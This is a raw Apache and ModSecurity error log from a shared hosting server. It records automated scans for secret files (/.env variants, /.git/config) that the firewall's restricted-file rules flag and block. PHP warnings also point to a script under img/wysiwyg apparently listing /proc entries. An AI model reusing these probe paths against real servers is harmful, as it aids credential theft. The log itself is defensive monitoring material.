[Mon May 11 22:14:05.359484 2026] [security2:error] [pid 1601130:tid 1601160] [client 5.255.118.168:42648] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.habilis.space"] [uri "/.env.production"] [unique_id "agI4jXEgAO_835W6c1mSegAAAEo"]
[Mon May 11 22:14:05.360084 2026] [security2:error] [pid 1601130:tid 1601160] [client 5.255.118.168:42648] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.habilis.space"] [uri "/.env.production"] [unique_id "agI4jXEgAO_835W6c1mSegAAAEo"]
[Mon May 11 22:14:05.360427 2026] [security2:error] [pid 1588898:tid 1588907] [client 5.255.118.168:42640] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.habilis.space"] [uri "/403.shtml"] [unique_id "agI4jaFW67LJTsgN3jQIeAAAAAg"]
[Mon May 11 22:14:05.360754 2026] [security2:error] [pid 1601130:tid 1601160] [client 5.255.118.168:42648] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.habilis.space"] [uri "/403.shtml"] [unique_id "agI4jXEgAO_835W6c1mSegAAAEo"]
[Mon May 11 22:14:05.361179 2026] [security2:error] [pid 1590352:tid 1590394] [client 5.255.118.168:42664] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.habilis.space"] [uri "/api/.env"] [unique_id "agI4ja1q0G_aXAqWauT2rgAAAII"]
[Mon May 11 22:14:05.361345 2026] [security2:error] [pid 1590352:tid 1590394] [client 5.255.118.168:42664] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.habilis.space"] [uri "/api/.env"] [unique_id "agI4ja1q0G_aXAqWauT2rgAAAII"]
[Mon May 11 22:14:05.361776 2026] [security2:error] [pid 1590352:tid 1590394] [client 5.255.118.168:42664] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.habilis.space"] [uri "/403.shtml"] [unique_id "agI4ja1q0G_aXAqWauT2rgAAAII"]
[Mon May 11 22:14:05.414674 2026] [security2:error] [pid 1590352:tid 1590410] [client 5.255.118.168:42674] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.habilis.space"] [uri "/backend/.env"] [unique_id "agI4ja1q0G_aXAqWauT2rwAAAJI"]
[Mon May 11 22:14:05.415030 2026] [security2:error] [pid 1590352:tid 1590410] [client 5.255.118.168:42674] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.habilis.space"] [uri "/backend/.env"] [unique_id "agI4ja1q0G_aXAqWauT2rwAAAJI"]
[Mon May 11 22:14:05.415586 2026] [security2:error] [pid 1590352:tid 1590410] [client 5.255.118.168:42674] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.habilis.space"] [uri "/403.shtml"] [unique_id "agI4ja1q0G_aXAqWauT2rwAAAJI"]
[Mon May 11 22:14:07.538974 2026] [ssl:error] [pid 1605480:tid 1605542] (EAI 2)Name or service not known: [client 5.255.118.168:44498] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 22:14:07.539579 2026] [ssl:error] [pid 1605480:tid 1605542] AH01941: stapling_renew_response: responder error
[Mon May 11 22:14:11.016830 2026] [authz_core:error] [pid 1590352:tid 1590409] [client 216.73.216.110:3558] AH01630: client denied by server configuration: /home/missmand/public_html/vendor/cocur/slugify/src/Bridge/Twig/error_log
[Mon May 11 22:14:13.431957 2026] [authz_core:error] [pid 1590352:tid 1590409] [client 216.73.216.110:3558] AH01630: client denied by server configuration: /home/missmand/public_html/vendor/cocur/slugify/src/Bridge/Symfony/error_log
[Mon May 11 22:14:23.014607 2026] [security2:error] [pid 1605480:tid 1605534] [client 129.226.211.69:57090] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cpanel.totalcloud.fr"] [uri "/"] [unique_id "agI4nx2Cvzd_nyNfUm_6pwAAAQw"]
[Mon May 11 22:14:23.289345 2026] [authz_core:error] [pid 1606352:tid 1606421] [client 216.73.216.110:46596] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/vendor/cocur/slugify/tests/Bridge/Silex/error_log
[Mon May 11 22:14:53.022042 2026] [proxy_fcgi:error] [pid 1606352:tid 1606438] [client 45.94.31.112:57626] AH01071: Got error 'Primary script unknown'
[Mon May 11 22:14:58.412704 2026] [security2:error] [pid 1534836:tid 1534884] [client 43.153.215.249:57520] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/wp-content/uploads/2023/02/Echo-Narcisse-et-lart-daimer-extrait-7-bis.mp3"] [unique_id "agI4wteaRXe5lR8y0ZOxIAAAAU0"]
[Mon May 11 22:15:06.866381 2026] [authz_core:error] [pid 1601130:tid 1601171] [client 216.73.216.110:21321] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/vendor/cocur/slugify/tests/Bridge/Laravel/error_log
[Mon May 11 22:15:06.944326 2026] [authz_core:error] [pid 1588898:tid 1588907] [client 216.73.216.110:14402] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/vendor/cocur/slugify/tests/Bridge/Silex/error_log
[Mon May 11 22:15:33.089182 2026] [authz_core:error] [pid 1601130:tid 1601169] [client 216.73.216.110:61477] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/vendor/cocur/slugify/tests/Bridge/Latte/error_log
[Mon May 11 22:15:37.052779 2026] [authz_core:error] [pid 1601130:tid 1601151] [client 95.111.239.37:61702] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-includes/ID3/error_log, referer: binance.com
[Mon May 11 22:15:44.101942 2026] [authz_core:error] [pid 1601130:tid 1601164] [client 95.111.239.37:64147] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-includes/ID3/error_log, referer: binance.com
[Mon May 11 22:15:48.951369 2026] [ssl:error] [pid 1590352:tid 1590412] (EAI 2)Name or service not known: [client 43.166.238.12:34148] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:15:48.951644 2026] [ssl:error] [pid 1590352:tid 1590412] AH01941: stapling_renew_response: responder error
[Mon May 11 22:15:49.858016 2026] [security2:error] [pid 1590352:tid 1590412] [client 43.166.238.12:34148] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "happy-baby-box.fr"] [uri "/"] [unique_id "agI49a1q0G_aXAqWauT3RAAAAJQ"], referer: http://happy-baby-box.fr
[Mon May 11 22:15:50.853628 2026] [ssl:error] [pid 1590352:tid 1590409] (EAI 2)Name or service not known: [client 43.166.238.12:36864] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:15:50.853660 2026] [ssl:error] [pid 1590352:tid 1590409] AH01941: stapling_renew_response: responder error
[Mon May 11 22:15:51.195663 2026] [security2:error] [pid 1590352:tid 1590409] [client 43.166.238.12:36864] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "happy-baby-box.fr"] [uri "/cgi-sys/suspendedpage.cgi"] [unique_id "agI4961q0G_aXAqWauT3RQAAAJE"], referer: https://happy-baby-box.fr/
PHP Warning:  filesize(): stat failed for /proc/45/task/45/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/45/task/45/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/45/task/45/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/45/task/45/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/45/task/45/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/45/task/45/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 22:15:54.359121 2026] [authz_core:error] [pid 1606352:tid 1606426] [client 95.111.239.37:51029] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-includes/IXR/error_log, referer: binance.com
[Mon May 11 22:15:56.033410 2026] [:error] [pid 1606352:tid 1606433] [client 114.119.136.64:34003] File does not exist: /home/totalcloud/public_html/index.php, referer: https://totalcloud.fr/login-form/
[Mon May 11 22:16:01.851358 2026] [authz_core:error] [pid 1534836:tid 1534882] [client 216.73.216.110:16598] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/vendor/cocur/slugify/tests/Bridge/Latte/error_log
[Mon May 11 22:16:02.662241 2026] [authz_core:error] [pid 1588898:tid 1588907] [client 95.111.239.37:53469] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-includes/IXR/error_log, referer: binance.com
[Mon May 11 22:16:16.786937 2026] [ssl:error] [pid 1601130:tid 1601154] (EAI 2)Name or service not known: [client 82.16.203.36:64490] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 22:16:16.790244 2026] [ssl:error] [pid 1601130:tid 1601154] AH01941: stapling_renew_response: responder error
[Mon May 11 22:16:33.069884 2026] [autoindex:error] [pid 1601130:tid 1601169] [client 35.87.186.24:53610] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 22:16:33.119006 2026] [authz_core:error] [pid 1588898:tid 1589210] [client 47.128.47.135:41994] AH01630: client denied by server configuration: /home/missmand/public_html/actualite/error_log
[Mon May 11 22:16:36.406695 2026] [security2:error] [pid 1534836:tid 1534881] [client 185.213.245.160:53481] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI5JNeaRXe5lR8y0ZOxjgAAAUo"], referer: https://www.piregwan-genesis.com/
[Mon May 11 22:16:53.192006 2026] [security2:error] [pid 1605480:tid 1605532] [client 43.159.135.203:35380] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.apoe.fr"] [uri "/"] [unique_id "agI5NR2Cvzd_nyNfUm_7OgAAAQo"], referer: http://www.apoe.fr
[Mon May 11 22:16:54.673695 2026] [security2:error] [pid 1601130:tid 1601159] [client 176.65.139.238:36320] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com"] [uri "/app/.env"] [unique_id "agI5NnEgAO_835W6c1mTIgAAAEk"]
[Mon May 11 22:16:54.673940 2026] [security2:error] [pid 1601130:tid 1601159] [client 176.65.139.238:36320] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/app/.env"] [unique_id "agI5NnEgAO_835W6c1mTIgAAAEk"]
[Mon May 11 22:16:55.748480 2026] [security2:error] [pid 1606352:tid 1606433] [client 176.65.139.237:48078] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com.ventes-privees-auto.fr"] [uri "/app/.env"] [unique_id "agI5N3o_DFxNSZVmaX3MVAAAAM4"]
[Mon May 11 22:16:55.748724 2026] [security2:error] [pid 1606352:tid 1606433] [client 176.65.139.237:48078] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com.ventes-privees-auto.fr"] [uri "/app/.env"] [unique_id "agI5N3o_DFxNSZVmaX3MVAAAAM4"]
[Mon May 11 22:16:56.545873 2026] [authz_core:error] [pid 1590352:tid 1590403] [client 216.73.216.110:12833] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/vendor/cocur/slugify/tests/Bridge/Latte/error_log
[Mon May 11 22:16:57.523505 2026] [security2:error] [pid 1606352:tid 1606433] [client 176.65.139.237:48078] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com.ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agI5N3o_DFxNSZVmaX3MVAAAAM4"]
[Mon May 11 22:16:57.524841 2026] [security2:error] [pid 1601130:tid 1601159] [client 176.65.139.238:36320] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agI5NnEgAO_835W6c1mTIgAAAEk"]
[Mon May 11 22:17:03.321514 2026] [autoindex:error] [pid 1590352:tid 1590396] [client 129.146.16.50:58715] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 22:17:26.130331 2026] [security2:error] [pid 1605480:tid 1605522] [client 43.130.32.245:45776] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agI5Vh2Cvzd_nyNfUm_7kgAAAQA"]
[Mon May 11 22:17:28.584458 2026] [security2:error] [pid 1606352:tid 1606435] [client 43.130.32.245:47836] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/nos-services/"] [unique_id "agI5WHo_DFxNSZVmaX3MewAAANA"], referer: https://www.castiglionecorporatefinance.fr/?p=868
[Mon May 11 22:18:03.686238 2026] [security2:error] [pid 1605480:tid 1605533] [client 102.165.5.149:31581] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI5ex2Cvzd_nyNfUm_7wwAAAQs"], referer: https://www.piregwan-genesis.com/
[Mon May 11 22:18:07.053224 2026] [security2:error] [pid 1605480:tid 1605543] [client 213.209.159.113:37112] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.git/config"] [unique_id "agI5fx2Cvzd_nyNfUm_7xQAAARU"]
[Mon May 11 22:18:07.053483 2026] [security2:error] [pid 1605480:tid 1605543] [client 213.209.159.113:37112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.git/config"] [unique_id "agI5fx2Cvzd_nyNfUm_7xQAAARU"]
[Mon May 11 22:18:07.053867 2026] [security2:error] [pid 1605480:tid 1605543] [client 213.209.159.113:37112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.git/config"] [unique_id "agI5fx2Cvzd_nyNfUm_7xQAAARU"]
[Mon May 11 22:18:15.945816 2026] [authz_core:error] [pid 1605480:tid 1605538] [client 95.111.239.37:59316] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-includes/sitemaps/providers/error_log, referer: binance.com
[Mon May 11 22:18:23.835763 2026] [authz_core:error] [pid 1588898:tid 1588900] [client 95.111.239.37:61666] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-includes/sitemaps/providers/error_log, referer: binance.com
[Mon May 11 22:18:31.970264 2026] [authz_core:error] [pid 1601130:tid 1601162] [client 95.111.239.37:64166] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-includes/widgets/error_log, referer: binance.com
